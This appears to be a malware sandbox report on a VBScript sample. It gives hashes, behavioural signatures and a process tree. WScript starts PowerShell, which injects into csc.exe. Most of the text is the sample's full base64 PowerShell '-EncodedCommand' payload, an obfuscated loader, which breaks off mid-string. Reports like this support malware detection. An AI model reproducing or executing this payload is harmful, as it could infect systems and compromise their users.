5768e1954e0e2e8d32dd31c7c312efa3bfc42fa9ea63101e9de35fe209278370

General

Target

115020077.vbs
Size

209KB
MD5

5beada8c6a728d89cf91a3e9e0e6fa72
SHA1

fab160d62c7a2ab3efd7ccd4e3bdaa0cd72ee2c5
SHA256

5768e1954e0e2e8d32dd31c7c312efa3bfc42fa9ea63101e9de35fe209278370
SHA512

d0d1b08f9b54a049a7adf122c2e6bd772c9f8cd52c8f504a13cbc126564f2c39d8a808633b69dc4da2146c371f7543b9abd3aea13a4d9deac555a7c5c71a61f9
SSDEEP

6144:8os1wpBZZcm+ZOKMj5TdY1B9O8owYXKKlF:5soPc9OZTdYP9ByT

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
972	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	972	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 972	1300	WScript.exe	27
PID 1300 wrote to memory of 972	1300	WScript.exe	27
PID 1300 wrote to memory of 972	1300	WScript.exe	27
PID 1300 wrote to memory of 972	1300	WScript.exe	27
PID 972 wrote to memory of 1064	972	powershell.exe	29
PID 972 wrote to memory of 1064	972	powershell.exe	29
PID 972 wrote to memory of 1064	972	powershell.exe	29
PID 972 wrote to memory of 1064	972	powershell.exe	29
PID 1064 wrote to memory of 1532	1064	csc.exe	30
PID 1064 wrote to memory of 1532	1064	csc.exe	30
PID 1064 wrote to memory of 1532	1064	csc.exe	30
PID 1064 wrote to memory of 1532	1064	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\115020077.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABQAGwAdQBrAGsAZQB0AHMAIAA9ACAAQAAnAA0ACgBhAGgAbwByAG4AQQBGAHUAbgBuAGUAZABMAGcAbgBlAHIAZABFAGoAZQByAGsALQBJAG4AdABlAHIAVABFAHIAbgByAGkAeQBIAGUAbgBzAHQAcABKAHUAbgBpAHMAZQBiAGQAawBlAHIAIABUAGEAbgBkAGUALQBGAGwAbABlAHMAVABFAHAAaQBnAHIAeQBOAG8AbgBnAGwAcABNAGUAZABhAG4AZQBzAGsAaQBuAGsARABNAGEAcwBrAGkAZQBCAHUAbABsAGQAZgBQAGQAYQBnAG8AaQBOAGUAdABzAHQAbgBVAGQAbQBhAGwAaQBVAGQAZgByAGQAdABGAGkAbABtAG4AaQBCAHIAbgBlAHAAbwBEAGEAYQBoAGkAbgBTAGsAeQB0AHQAIABTAGUAbgBnAGUAQABGAGEAcgByAGEAIgAKAEEAbgByAGUAdAB1AFQAaABlAGEAdABzAFUAbgBjAG8AbgBpAEsAbAB1AG0AcABuAFYAaQBsAGQAcwBnAEIAdQBuAG4AaQAgAFMAbABrAGsAZQBTAFUAbAB0AGsAbgB5AGQAZQBsAGkAcgBzAEsAbABrAHMAcwB0AEQAZQBwAGkAbABlAEMAbwB3AG0AZQBtAFMAZQByAGkAcAA7AAoARwBhAGwAcwBrAHUATABlAHUAYwBvAHMAQgBlAGEAcwB0AGkAQgBvAGIAcwBwAG4AQgBpAGwAYQB0AGcAVgBlAGoAbABlACAARABnAG0AbwBiAFMAUAByAGUAaQBuAHkAVQBuAGwAaQBtAHMATQBpAHMAcwB1AHQAVQBlAHIAcwB0AGUAUwB0AHkAcgB0AG0ATQB1AHIAdABoAC4AUwB2AHIAdgBnAFIAQgB5AHQAdABlAHUATABlAHYAZQByAG4ARwByAHUAZgBmAHQASQBjAG8AbgBvAGkAUwBrAHYAdQBsAG0AUwB3AGEAcgB0AGUAUwBtAGEAYQB0AC4AUwBhAG0AbQBlAEkAUwBwAHUAdAB1AG4ATQBpAGMAcgBvAHQAdQBzAGsAeQBsAGUAUwBhAGIAYQBrAHIAVABpAGwAbAByAG8AZABlAGMAYQBzAHAAVQBuAGQAZQByAFMARABlAHIAbQBvAGUAUwBwAGkAbABkAHIATAB5AG0AZgBlAHYARgByAGUAawB2AGkARAB2AHMAdAB1AGMAQQBtAG4AaQBuAGUASgBhAGwAbwB1AHMAQgBlAHMAawBlADsACgBSAHkAZwBzAGsAcABUAGkAbQBlAGIAdQBWAGkAdABpAGwAYgBHAHIAYQBlAGsAbABTAG0AYQBkAGQAaQBTAGUAbABlAG4AYwBGAG8AcgB0AG8AIABQAGgAYQBsAGEAcwBCAGEAZwBzAGQAdABUAHUAYgB1AGwAYQBBAG4AdABhAHIAdABTAGEAbABwAHMAaQBTAHQAcgBhAGYAYwBTAGEAawBrAGUAIABUAGkAbQBvAHIAYwBTAHQAcgBrAG4AbABQAHIAbwBnAHIAYQBKAGEAcgBnAG8AcwBVAG4AaQBnAGUAcwBQAGUAYwB0AGkAIABNAGEAZAByAGUATwBFAHUAZgBvAHIAdgBTAGgAYQBrAGUAZQBUAHIAaQBzAHQAcgBUAG0AbgBpAG4AcABHAGwAZABzAGIAcgBMAGkAdgByAGUAaQBuAGEAdAB0AGUAYwBHAGEAcwB0AHIAaQBwAHUAbgBrAGEAMQAKAEQAZQB0AHIAYQB7AHQAcgBpAHQAZQBbAFMAawB5AGwAZABEAEEAbgBnAHUAbABsAFUAZABsAHMAdABsAFAAYQBuAHQAbwBJAEwAdQBuAGQAZQBtAEMAaABpAGcAZQBwAEwAaQB0AGgAbwBvAFAAcgBlAGYAbAByAFcAaQBuAGcAYgB0AE8AcABlAHIAYQAoAEQAaQBmAGYAZQAiAEQAYQBuAGsAcgBnAE0AaQBjAHIAbwBkAHMAYQBsAGkAZgBpAFQAaAB5AHIAbwAzAEEAcgBiAGUAagAyAGgAdQBuAG4AaQAiAEgAbwBsAGUAcwApAE0AZQBrAGgAaQBdAFUAbgBjAGgAYQBwAEwAbABlAHMAYwB1AEEAbgBhAGwAeQBiAFMAbABlAHkAcwBsAFAAcgBvAHAAbwBpAEIAYQBnAGEAdABjAFQAbwByAG4AeQAgAEoAYQB3AHMAbQBzAFIAYQBpAG4AbAB0AEMAZQBuAHQAcgBhAEUAdgBhAGwAdQB0AFMAZQByAHYAaQBpAEMAbwBnAGkAdABjAEQAaQBzAGUAbgAgAE8AdgBlAHIAYwBlAFAAbwBzAHQAZQB4AFMAdAB2AHIAZQB0AFQAYQBsAGEAcABlAEYAbwByAHQAdgByAFMAdABlAGwAZwBuAEIAcgB5AHMAdAAgAFMAawByAGEAYQBpAE0AYQBtAG0AZQBuAEYAbwByAGIAYQB0AEIAdQBkAHMAcwAgAFQAYQByAGkAZgBHAEkAbgB0AHUAbQBlAGEAcgBvAG4AcwB0AEIAZQBoAG8AdgBQAEYAbABpAG4AdABhAEMAaQBzAHMAbwB0AEEAeQBsAG0AYQBoAEsAdQByAHMAdQAoAGsAbgBhAGwAZABpAFYAYQByAGUAaQBuAE0AZQBzAG8AdAB0AEwAZQBqAG4AaQAgAGQAaQBkAGEAYwBPAFUAbgByAGUAbAB2AFQAbwBwAGsAYQBlAEcAcgBhAG4AZAAxAGEAcABvAGwAbAA0AEQAaQBzAHEAdQA4AGEAYwBxAHUAZQAsAFUAbgByAHUAZgBpAEYAeQByAGkAbgBuAFQAYQBuAG4AaQB0AEIAZQBzAGsAbgAgAEgAZQByAGwAcwBVAFAAZQByAHMAZQBuAEMAbABpAG4AdABmAFQAcgB5AGsAawAsAEsAcgBvAG8AcABpAFMAdABvAGsAYQBuAGQAaQBzAHAAdQB0AE8AdgBlAHIAagAgAEQAdQBiAG8AbgBGAFMAcABlAGMAaQB1AEEAbQBtAG8AbgBjAEUAbABlAHYAZQBhAFMAdABuAG4AZQB0AE8AYgBqAHUAcgBpAEQAaQBzAHAAYQAxAFAAdQBuAGcAaQAxAEUAbQBpAGcAcgAxAEQAYQBtAHAAbQAsAFUAbgBsAGEAZABpAEMAYQBuAGMAZQBuAFYAYQByAG0AdAB0AEwAYQBkAGEAawAgAFIAaQBzAGkAawBzAGIAZQBmAGEAdABrAEcAaQBhAG4AdAByAEEAcwBzAGEAcwBhAFMAeQBuAGQAZQApAEcAZQBuAGUAcgA7AAoAUgBvAHQAdQBuAFsATQBvAG4AbwBjAEQARABqAHYAZQBsAGwAcwBvAG4AaQBjAGwAQwBvAGwAZQBvAEkATwByAGsAaQBkAG0AVABpAHAAcABlAHAASwBvAG4AcwB1AG8AUgBpAGwAbABlAHIAYgB5AGwAZABlAHQATwBtAHIAYQBhACgAVAB1AGIAZQByACIAbgBhAHYAbABlAGsAQwBhAHIAbgBpAGUAVQBuAGMAbwBuAHIAUABlAG4AZABlAG4AVQBuAGMAbwBuAGUAVAByAHIAZQBwAGwATwB2AGUAcgB3ADMAVQBuAHMAbQBpADIAVAByAGkAdgBpACIATABvAG4AZwBvACkASABlAHIAbgBlAF0AUgBlAHQAYQBiAHAAVQBuAHYAaQB2AHUAQQBiAHMAaQBuAGIAVABvAHAAaABlAGwAUgBvAGIAYgBpAGkAQgBvAGcAawBsAGMAQgBqAGUAcgBnACAAcABhAHMAawB1AHMARQBuAHMAcABvAHQATwB1AHQAcAB1AGEAQwBlAG4AdAByAHQAUwBjAHUAdAB1AGkASABhAG4AZABlAGMAdABpAGwAYgBhACAAUABoAGEAcgB5AGUAUQB1AGEAZAByAHgAQQByAGsAZQByAHQARgBpAGEAcwBrAGUAUAB1AG0AYQBlAHIAUAB1AG0AcABkAG4AUwBjAHIAZQBlACAATwB2AGUAcgB0AGkAVQBuAGQAZQByAG4ARwBhAGIAYgBpAHQAZQB4AG8AYwBvACAAVAByAHMAdABlAFMARwByAGkAcABoAGUARwBlAG4AZQByAHQARABvAGcAbABwAFUATABvAHIAZQBuAG4AcwBuAGUAawBhAGgATAB1AGEAdQBnAGEAQwBvAHIAbwBuAG4AQgBvAG4AaQB0AGQAQgBlAG0AZQBlAGwASQBzAGMAaABpAGUASwBsAGEAdgByAGQARQBrAHMAZQBtAEUARQBzAGMAaABhAHgARwBhAGwAbABhAGMAUwB3AGUAZQB0AGUATwB1AHQAYQBnAHAARgBpAGwAbQB1AHQARABlAGoAcwBlAGkAQwB1AGIAaQBjAG8ARQBzAHQAaQBtAG4ARABpAHMAYwBvAEYAVgBlAHMAdAByAGkASQBuAGgAYQBsAGwAQQBtAG8AcgB0AHQASABqAGUAbQBtAGUAQwBpAHQAcgBvAHIAQwBsAGEAdABoACgATABhAG4AZABlAGkARABvAHQAdABsAG4ATwB2AGUAcgByAHQATgBvAHIAZQBuACAAUABsAGEAZABzAEcAYQByAG0AYQB0AG8ARwBlAG4AbwBwAGIAUABlAHIAYgBvAGwASABlAHQAcwB5AGkAVAByAGkAbgBmAG4ARABlAGQAaQBrACkASwBsAGEAZwBlADsACgBHAGEAbQBtAGEAWwBCAGEAbABrAGkARABDAGEAdQBsAG8AbABFAG0AYgByAG8AbABNAGUAbgBpAGcASQBQAHIAbABhAHQAbQBCAG8AbwBrAGIAcABvAHAAYgB1AGQAbwBXAGkAbgBuAGQAcgBGAG8AcgB0AHIAdABmAG8AcgB1AGQAKABBAG0AcABoAGkAIgBEAGkAcwBjAGkAdQBHAHUAaQB0AGEAcwBQAGwAZQBhAHMAZQBUAGEAYgBsAGUAcgBNAGEAcwBzAGEAMwBUAGUAcgBtAGkAMgByAG8AYwBrAGIAIgBrAHUAbABsAGUAKQBsAGUAZABlAGIAXQBPAHUAdABkAGEAcABPAHYAZQByAHMAdQBGAHUAbgBrAHQAYgBUAHUAbQBsAGkAbABkAGkAcwBzAG8AaQBUAHIAaQBiAHUAYwBQAGwAYQB0AHkAIABEAG8AcgBzAG8AcwBTAGUAbABlAG4AdABGAGwAYQB0AGwAYQBTAGEAcgBjAGEAdABNAGUAcwB0AHIAaQBLAGEAYgBlAGwAYwBQAGgAaQBsAG8AIABBAG4AbQBvAGQAZQBQAGEAdgBpAHMAeABkAGUAbQBhAHMAdABCAHkAZwBnAGUAZQBLAGEAbABpAG0AcgBNAHUAbQBtAGUAbgBVAG4AdABvAG4AIABUAGkAYgBlAHIAaQBBAG4AdABhAHAAbgBIAHkAcABlAHIAdABJAG4AcAB1AHQAIABDAG8AbgBuAGEASQBNAG8AbgBvAHQAcwBCAGUAcgBlAGcARABIAHUAcwBzAHQAaQBCAGEAbABsAGUAYQBFAHQAYQBhAHIAbABQAGUAZABkAGUAbwBDAGUAcwB0AG8AZwByAGEAYQBzAHQATQBSAGUAbgBzAGsAZQBjAGgAbwBrAGUAcwBNAG8AbABzAGMAcwBXAGEAbgB0AG8AYQBDAG8AcgByAGkAZwBLAG8AbQBwAGwAZQBLAG8AbQBtAGEAKABEAGkAdgBvAHIAaQBSAHUAYgBpAG4AbgBCAG8AZwBrAGEAdABQAHMAeQBrAG8AIABOAG8AdwBlAGQAVQBEAGUAbABzAHQAbgBTAHkAbgBhAHAAcABPAHAAcwBwAGEAZQBPAHYAZQByAHQALABzAHQAbwB3AHMAaQBPAHYAZQByAHMAbgBzAGUAcgBpAG8AdABDAG8AbgBzAHQAIABGAHkAcgByAGUARgBQAGgAbwBjAGEAaQBBAGYAdgBlAGoAbABWAGkAbgB0AGUAaQBBAGwAdQBtAGkAZwBCAGUAZwBtAGEAKQBMAHIAZQBhAG4AOwAKAEYAdQBnAHQAaQBbAFMAdABuAGQAZQBEAEIAcgBuAGUAZgBsAFYAYQBuAGQAcABsAGwAbwByAGQAbABJAE8AdgBlAHIAbQBtAGwAbwBnAHIAZQBwAEMAbwByAGEAbABvAFMAeQBnAGUAaAByAEIAZQBzAHAAbgB0AFAAZQByAG0AaQAoAEIAaQBvAHQAZQAiAEEAbgBlAHQAYQBnAFQAYQBqAGcAYQBkAFMAdQBiAHQAYQBpAEIAYQBuAGEAbgAzAFMAYQB0AGUAbAAyAEcAYQB0AGUAYQAiAEEAcABvAHQAZQApAGUAdABoAHkAbABdAFUAcwBoAGUAcgBwAE0AeQB0AGgAbwB1AEwAbwBmAHQAbABiAFAAZQByAHYAZQBsAFMAdQByAHQAZQBpAFIAbwBvAHMAdABjAFMAawB5AGcAZwAgAFMAYQBnAG4AbwBzAEMAaABlAGUAcgB0AG4AZQBkAGsAbQBhAFcAbwBuAHQAbAB0AEQAYQBhAGIAcwBpAFMAZQBqAGwAYgBjAEIAZQBsAGwAeQAgAFQAYQByAGkAZgBlAEcAaQB2AGUAZgB4AHQAZQB0AHIAYQB0AGsAbABnAGwAYQBlAFMAdABlAHIAcwByAHUAbgBwAGEAdABuAEYAYQBuAHQAYQAgAEQAaQBrAHQAZQBpAEcAYQBzAG8AZwBuAEwAcgBkAG8AbQB0AFIAYQBrAGsAZQAgAFMAdwBhAG4AcwBDAFIAZQBwAG8AcwByAFMAYQBiAGIAYQBlAGQAZQB2AGUAbABhAEEAYwBoAGkAbAB0AEcAZQBuAGUAcgBlAFYAYQBuAGQAZgBFAEQAYQBjAHIAeQBuAFIAaQBmAGEAcgBoAEwAZQByAGoAbwBNAEMAZQBuAHQAcgBlAEYAYQBpAGwAYQB0AGEAdQB0AG8AbQBhAEEAdQB0AG8AbQBGAEYAcgBlAGsAdgBpAFMAdQBwAGUAcgBsAEEAdAB0AGEAYwBlAFQAaQBwAGwAbwAoAEIAZQB0AG4AawBpAEIAbwBiAGEAZABuAEQAcgBlAGoAZQB0AEgAbwBtAG8AZQAgAEYAdQBsAGQAcwBDAEsAbwB0AG8AYQBsAFMAcABpAHIAaQBlAFQAaABlAG8AcABvAFMAawBpAGIAcwAsAEEAcgBpAHoAbwBpAE0AYQByAGMAaABuAFYAcgBnAGUAbAB0AEIAcgB1AGQAZQAgAEkAbgBjAGkAcgBCAFMAeQBuAGEAbgBvAE8AYgBlAHIAcwBuAFMAdQBrAGsAYQB2AHIAZQB1AHQAaQBpAFQAbwBkAGQAeQAxAEcAcgBhAGMAZQA0AEUAcQB1AGkAdgA2AEYAdQBsAGQAZgAsAEIAZQBzAHQAaQBpAFQAcgBhAGIAZQBuAEcAaQBhAHIAcgB0AFMAZQBtAGEAbgAgAE0AYQBjAHIAbwBWAEsAYQByAGcAYQBhAEYAYQBrAHQAdQBuAEIAYQByAGUAbgBwAFoAeQBnAG8AbQBvAFIAeQBuAGsAZQBvAFMAYQBtAHMAZQAsAFMAdABvAGkAcwBpAGIAaQBvAGcAZQBuAFQAZQBlAHQAbwB0AFUAbgBkAGUAcgAgAEkAbABsAG8AcgBTAFUAcgBvAGgAcgBwAEMAbwBhAGwAaQBpAEQAYQBhAHIAbABuAFEAdQBhAGQAcgBkAFQAaQBnAGUAbAApAGsAaQByAG8AcAA7AAoAQQByAGIAZQBqAFsAZgByAGUAcwBjAEQATQBvAGIAaQBsAGwARAB5AGsAcwB2AGwARAB1AHYAZQB0AEkASgBlAHIAbgBnAG0ATQBlAHMAcwBpAHAATABhAHUAbgBjAG8AQQBpAG8AbABpAHIAcwBlAHIAcgBhAHQARgBlAHYAZQByACgASwBvAHIAcwBvACIARgByAGkAbQBuAGwAYgBvAHIAZwBlAHoARgBhAGcAawBvADMAUAByAGUAdABoADIAQwByAGEAZABsAC4AVwBlAHIAbgBlAGQAVABpAHIAYQBpAGwAQgBoAGEAbgBkAGwAUwB1AHIAZwBpACIASwBhAHQAaABsACkAQQB0AHQAYQBjAF0AQgBvAHIAZQBhAHAARwBlAHIAYQBlAHUAQgBlAGEAawBlAGIARABlAGMAcgBlAGwAUgBlAHQAcgBvAGkAVQBkAGQAYQB0AGMAUwBlAGsAcwB0ACAAQwBvAG0AcAB1AHMARABtAG4AaQBuAHQAUgBlAHMAbwBuAGEAQQBmAHMAcABlAHQAQgBpAGwAdAByAGkATQBhAGEAbgBlAGMAVwBlAGUAdwBlACAAQQBuAGEAbgBkAGUAQgBlAGQAaQBuAHgATQB5AGwAZAByAHQAVAByAGEAbgBzAGUAQQByAGIAZQBqAHIARABvAHIAeQBwAG4AVAByAGYAcgBpACAAUwB0AGEAdABpAGkAZQBqAG4AbwBzAG4AUwB0AGEAbgBmAHQAUABvAGwAeQBwACAARAByAGkAawBuAEcASABqAGUAbQBnAGUATAB1AHMAawBlAHQARQBzAGMAdQBsAEUAQgBlAHIAYQBpAHgARgBvAHIAZQByAHAAUABoAGEAcgB5AGEAQQBzAHkAbQBwAG4AVQBuAGYAbAB1AGQAUwBrAGkAbgBnAGUASAB5AHAAbwB0AGQAUABhAGwAZQBvAE4ARQB4AGMAaQBkAGEARgBhAHIAdgBlAG0AYQBtAGIAdQBsAGUASwB1AGcAbABlACgAQgBpAG8AZgBsAGkARABhAHYAaQBkAG4AaABqAHQAaQBkAHQAcwBrAHIAdQBwACAAdQBkAHAAZQBiAEEAQgBlAGIAbwBlAGMASQBuAGQAdAByAGEASgBvAHIAZABmAGQAUwBsAHkAbgBnACwATQBpAHIAdABoAGkARQByAGEAZABpAG4AUAB1AHIAaQB0AHQARwBhAHkAYwBhACAARwBhAG4AZwBuAFAAaQBsAGwAdQBzAHkAcwB1AGYAZgBlAG8ARQByAGkAZwBsAG4ARQBrAHMAcAByACkATABvAHYAcAByADsACgBVAG4AbQBpAHQAWwBDAGEAbgBkAHkARABDAGwAYQBwAGIAbABQAGUAcgBvAGIAbABGAGkAbABtAGIASQBTAGcAZQB0AGkAbQBBAHMAcwBlAG0AcABVAG4AYwByAHkAbwBEAGEAdABhAGkAcgBBAHIAbQBlAHIAdABTAGgAaQBwAHAAKABCAGgAYQBrAHQAIgBlAGEAcwB0AHcAZwBQAGUAcwBzAHUAZABSAGUAdAByAG8AaQBtAGUAZAB1AHMAMwBEAGUAcgB2AGkAMgBOAHkAYgByAHUAIgBJAG4AdABlAHIAKQBCAG8AcgB0AGUAXQBTAHAAZQBnAGUAcABJAG4AZABkAGEAdQBXAHIAYQBpAHQAYgBBAG0AcABoAGkAbABVAGwAZAB0AHIAaQBBAGwAdABpAHMAYwBJAGQAZQBvAGwAIABVAGwAdQBsAGEAcwBTAHUAYgB0AHIAdAB0AG8AawBhAHkAYQBTAGIAeQBlAHIAdABoAGsAYgByAHQAaQBHAGwAbwByAGkAYwBHAHIAYQBtAG0AIABBAG4AcABhAHIAZQBTAHQAbwBwAHAAeABNAG8AcgBnAGUAdABGAG8AcgBwAGwAZQBGAG8AcgBnAGwAcgBSAGUAcwBpAG4AbgBjAGEAdgBlAG0AIABTAGsAbwBzAGUAaQBTAHQAdQBkAGUAbgBBAHQAbwBtAHMAdABBAGYAcABhAHIAIABPAHYAZQByAHMAUgBTAG8AdQB2AGUAZQBVAG4AYwBvAG4AYwBBAGIAcwBlAG4AdABGAGwAdQBvAHIAVgBSAHkAZwBtAGEAaQBDAGwAaQBtAGEAcwBVAGwAcgBpAGsAaQBLAHUAbgBkAGUAYgBEAGUAYwBpAG0AbABSAGEAZABpAG8AZQBOAGUAZwBsAGkAKABJAG4AdABlAHgAaQBTAHQAYQB0AHUAbgBWAG8AbABvAG4AdABTAGEAbABnAHMAIABTAHQAYQB1AG4AYQBZAGEAZwB1AGEAbQBiAHUAcgBsAGUAYgBMAGUAdgBuAGUAZQBEAGUAcABoAGEALABQAGUAcgBsAGkAaQBQAGwAdQB2AGkAbgBTAGMAbwByAGIAdABwAHIAbwBjAGUAIABSAGEAbgBnAGkAUABQAHIAaQBkAGUAYQBBAHUAdABvAG4AcgBKAG8AZwBlAGQAKQBPAGQAaQB1AG0AOwAKAE8AeABpAGQAYQBbAGEAZgBoAG4AZABEAEEAbABsAG8AcABsAFYAZQBnAGUAdABsAEQAcgBlAHAAYQBJAFIAZQB0AHMAZgBtAEoAbwB1AHIAbgBwAG4AZQBkAGQAeQBvAFYAZQBqAHIAdAByAFMAYQBuAHoAZQB0AEgAeQBwAG8AYwAoAEMAZQBjAGkAbAAiAFUAbgBkAGUAcgBrAE8AbABpAHMAawBlAE4AeQBzAHQAaQByAFIAbwB1AHQAaABuAEEAawBhAG4AawBlAFMAbwBnAGQAaQBsAEEAcgB0AGkAcwAzAFcAaQB2AGUAcgAyAFMAdABlAG4AZQAiAEQAbwBsAG8AbQApAFIAZQBqAG4AaABdAFQAbwBwAHMAZQBwAEgAZQBtAHAAcwB1AGUAZABkAG8AZQBiAEkAbgB2AG8AbABsAFAAbABhAGkAZABpAEcAbwBsAHUAcABjAE4AbwBuAGQAaQAgAFUAbgBwAG8AcwBzAE8AZABkAGUAcgB0AEYAbwByAG0AYQBhAEIAbAB1AHQAdwB0AFAAcgBlAHMAcwBpAEIAcgBhAG4AZABjAGwAYQBwAGEAcgAgAEQAZQBzAHAAZQBlAFQAaQB0AHQAZQB4AFUAZABnAHIAYQB0AFUAbgBtAG8AZABlAFYAdQBsAGsAYQByAEEAbQBpAG4AbwBuAEIAdgBlAHIAbAAgAE0AaQBzAGUAcgBJAFIAeQBzAHQAZQBuAFMAbwBkAGEAawB0AEEAbgBzAHQAbgBQAEwAcwBuAGUAcwB0AFMAeQBtAGYAbwByAEEAcwBpAGEAdAAgAFAAYQBwAGUAZwBFAE0AbwByAGEAcgBuAFMAbABvAGQAZwB1AFQAbwByAHQAbwBtAFoAbwBuAGUAdABTAFQAcgBlAHMAcwB5AEYAcgBhAGcAaQBzAEMAYQBmAGUAYgB0AEIAcgBzAHQAbgBlAFUAZAB2AGEAbgBtAFUAdABpAGwAaQBMAFIAZQB3AGkAcwBvAE0AZQBwAGEAYwBjAEIAeQBnAG4AaQBhAEMAaABpAHMAZQBsAGEAZAByAGUAbgBlAEIAdQBuAGMAaABzAFMAdAB5AHIAawBBAEEAcgBiAGUAagAoAEEAZgB0AGEAZwB1AFcAaABlAHkAZQBpAEIAYQBnAG4AZQBuAFUAbgBzAHUAcAB0AEMAYQBjAGgAdQAgAHIAbwB1AGcAaAB2AFMAcABkAGwAZQAxAGMAYQB0AG8AYwAsAFUAbgBpAHYAZQBpAEEAcgB0AGUAcgBuAFAAdQB0AHQAeQB0AE0AbwB6AHoAZQAgAGcAZQBuAGkAbgB2AEEAZgBpAGMAaQAyAEYAcgBpAGsAdgApAFUAcABhAHIAdAA7AAoAUwB0AGUAbQBwAFsAQwBhAG4AdABhAEQAUABvAGwAbAB1AGwAWQBlAHMAdABlAGwAVABoAHkAcwBlAEkAQgBsAG8AdAB0AG0AUgBlAGEAbABpAHAAUAByAHQAZQBuAG8AbwBtAHMAYQBkAHIAUgBlAGMAeQBjAHQAVABhAGwAZQByACgARwBvAG4AZQBkACIAVQBuAGQAZQByAHcATgBnAGwAZQBsAGkAdABhAGIAdQBsAG4ARgBpAHoAZQBsAG0AUgBhAG4AZwBsAG0AUABlAHIAZgBlAC4AawBhAGwAaQBmAGQARgByAGkAegBlAGwAUgBpAGcAaAB0AGwATwB4AGkAZABlACIARgByAGkAdAB6ACkAVgBhAHIAdABhAF0AQwBhAG4AYwBlAHAASQBuAGQAbwBtAHUAVQBkAGwAZQBqAGIAUwB1AHAAZQByAGwAaABqAHIAZQBzAGkAQwByAGUAcABlAGMAUwBsAGEAbQBiACAATwBuAGUAdABpAHMAVQByAGgAbgBzAHQAUwB1AHAAZQByAGEAVAByAGEAYwBoAHQAUwB0AHYAYgBvAGkARgBvAHIAbwBtAGMARgBsAGUAcgBiACAASwBvAG4AdAByAGUARgB1AHQAdQByAHgAQgBpAG4AbwBtAHQAVwBlAGIAZQBsAGUAUwBlAG4AcwBpAHIAQwB5AGEAbgB1AG4AZwBlAHMAaQB0ACAAUAB1AGcAZQByAGkARQBwAGgAZQBiAG4ARABlAHIAbgBlAHQARgBqAGUAcgBwACAARQBnAG0AdQBuAHcATwB2AGUAcgB3AGEAVABoAGUAZgB0AHYATwB2AGUAcgBlAGUAUgByAHMAYQBuAEkAUwB0AGUAbQBtAG4AQQBwAG8AbABvAFUATABhAG4AdABoAG4ASQBuAHYAZQBuAHAAVABlAGcAbgBmAHIAUwBpAGsAcwB0AGUARwBsAHkAYwB5AHAAZQBsAGwAaQBuAGEASQBuAGQAbABzAHIAVAByAGwAawB2AGUAcAByAG8AagBlAEgAcwBrAGkAbAB0AGUAUwBpAGsAawBlAGEAQwBvAG0AYQBrAGQAdABvAGwAZAB2AGUAUgBlAHAAbABhAHIARABpAHMAcgBlACgAVgBlAGoAbQBhAGkAQwByAGkAcwBzAG4ARABlAHYAbwBpAHQAQQBuAHQAaQB6ACAATgB1AG0AZQByAEEAUwBvAGwAZABpAGkAQgBlAHYAZwBlAHIAbwBtAHYAaQBzAGMASQBuAGQAYgBlAHIAUwBrAG8AbABlAGEAUwB1AGwAcABoACwARwByAGEAbgBhAGkARgBvAG8AbABlAG4AQgBlAGQAYQBhAHQAUwB5AG0AcAB0ACAAUgBlAGcAaQBvAEYATQB5AHQAaABpAG8AVQBkAGIAdQBsAHIAVAByAGUAcwBrAHUATwBiAG8AbABmAHIAUQB1AGkAbgB0ACwARABlAGwAZQBsAGkAVgBpAHQAZQByAG4ARQBiAG8AZQBmAHQAVQBuAGQAZQByACAARAB2AHIAZwB0AEoAVABlAHAAaAByAGUASQBuAGUAeABwAHIATgBhAHQAaQBvACkATABpAGcAZQBzADsACgBMAGEAeQBtAGUAWwBtAGUAdABjAGEARABGAG8AcgBnAHIAbABNAGEAbABsAGkAbABCAGEAbABzAGEASQBSAGQAbQBvAHMAbQBNAGoAZABlAHQAcABUAHUAcgBuAG0AbwBMAGEAcwB0AGIAcgBoAG8AcwBwAGkAdABCAGoAZQByAGcAKABCAG8AbwBlAGQAIgBUAG8AbQB0AGkAZwBDAGUAbABhAG4AZABKAG8AZQBuAGYAaQBWAGkAZABlAHIAMwBDAHUAcgBiAHQAMgBUAGEAcgBtAGUAIgBDAGEAbQBwAGkAKQBKAHUAbABlAHMAXQBVAG4AZABlAHIAcABGAHIAYQB2AHIAdQBWAGEAbgBkAGwAYgBBAG0AbQBvAG4AbABSAGEAYQBzAHQAaQBTAGMAcgBlAHcAYwBJAG4AZABlAGsAIABBAHAAcABlAG4AcwBDAGkAbgBlAGMAdABmAHIAYQBuAGsAYQBSAGUAbABlAGcAdABaAGkAbgBjAG8AaQBVAG4AdAByAHUAYwBkAGkAcwBtAGEAIABFAGwAZQBtAGUAZQBXAGEAdQBmAGkAeABWAGEAdAB0AGUAdABVAG4AaQBuAHMAZQBTAGUAZABpAG0AcgBQAHIAbwBmAGEAbgBlAHIAeQB0AGgAIABIAGUAawBzAGUAaQBCAGwAYQBkAGUAbgBSAGgAaQBuAG8AdABMAHAAbABhAG4AIABBAHIAcgBlAGEATABhAG0AbQBpAGMAaQBzAHkAbQBtAGUAbgBNAGEAbgB0AHUAZQBQAGgAbwB0AG8AVABFAG4AdABlAHIAbwBNAGkAZAB0AGUAKABTAHQAYQBtAHAAaQBBAG4AbgBpAGgAbgBWAGEAaABpAG4AdABCAGEAbgBhAGwAIABLAG4AYQBsAGwAUwBUAHUAcgBiAGkAaABpAHIAcgBhAHQAaQBNAHIAawBlAHIAcABGAG8AcgBkAHUAcABNAGkAbABsAGkALABFAHMAcAByAGkAaQBDAG8AbQBwAGwAbgBTAG0AaQBuAGsAdABEAGsAZgBhAHIAIABTAGMAcwBpAHUAYwBCAHMAcwBlAG4AaABLAGEAbAB2AHMAYQB0AHUAdAB0AGkAdABQAHIAZQByAGUAdABDAGgAbABvAHIAYQBBAGMAZQByAGIALABDAHkAcAByAGkAaQBDAGEAbgBuAG8AbgBUAGUAYQBiAGUAdABLAG4AaQB2AHMAIABBAHIAZwB5AHIAQQBGAGwAYQBuAGsAbgBTAGgAdQBmAGYAcwBIAHUAbgBkAGUAaQBPAG0AZwByAGUAZwBVAG4AcwBvAGwAKQBUAGgAZQBvA